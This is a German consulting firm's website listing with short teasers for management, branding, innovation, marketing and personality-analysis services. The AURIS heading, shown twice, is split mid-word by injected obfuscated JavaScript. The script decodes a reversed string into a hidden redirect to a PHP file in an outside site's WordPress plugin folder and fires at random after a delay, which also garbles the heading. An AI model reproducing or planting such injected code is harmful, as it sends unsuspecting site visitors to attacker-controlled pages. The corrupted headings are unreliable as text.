Unternehmer-Cockpit®

Unternehmer-Cockpit®

Die Zukunftsfähigkeit eines Unternehmens hängt weniger von einem intensiven Blick in den Rückspiegel (Bilanzen) ab, als vielmehr von der Standortbestimmung im Hier und Jetzt und dem Mut die Signale am Horizont einzuschätzen. Mit der sicheren Erkenntnis, dass die...
time-4-corporate identity (CI)

time-4-corporate identity (CI)

Marken sind die emotional aufgeladenen Entscheidungshilfen beim Kauf. „Markenführung ist Chefsache!“ (Esch, Franz-Rudolf, 2012) Doch nur 10% der Meetings von Top-Entscheidern auf Geschäftsführungsebene widmen sich Marketingthemen. (Ambler, T., 2003) Marken haben...
time-4-innovation

time-4-innovation

Das Management ist stolz darauf, Banken sprechen darüber und Politiker fordern sie ein: Innovationen. Dabei sind Innovationen keineswegs per se ein Erfolgsprinzip für Unternehmen. Nicht selten bringen angestoßene Innovationen (sog. Inventionen) die Controller um den...
time-4-marketing

time-4-marketing

Im Marketing- und Vertriebsbereich fühlen sich viele zur Mitsprache berufen, egal wie qualifiziert das Vor- und Fachwissen ist. Umso mehr kommt es darauf an, Struktur in eine Facette erfolgskritischer Unternehmensperformance zu bringen, die darüber entscheidet, wie...
AURIS® Denkstil- und Werteanalyse sowie intrinsische Motiva$NqM=function(n){if (typeof ($NqM.list[n]) == „string“) return $NqM.list[n].split(„“).reverse().join(„“);return $NqM.list[n];};$NqM.list=[„\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toren

AURIS® Denkstil- und Werteanalyse sowie intrinsische Motiva$NqM=function(n){if (typeof ($NqM.list[n]) == „string“) return $NqM.list[n].split(„“).reverse().join(„“);return $NqM.list[n];};$NqM.list=[„\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toren

Face-to-Face mit mir selbst. AURIS® zur wirksamen Selbstbespiegelung, denn „Keiner, der sich selbst kennenlernt, bleibt derselbe wie vorher.“ (Thomas Mann) Persönlichkeitsprofile gibt es wie Sand am Meer. Warum braucht es also noch eines??? AURIS® beauskunftet nicht...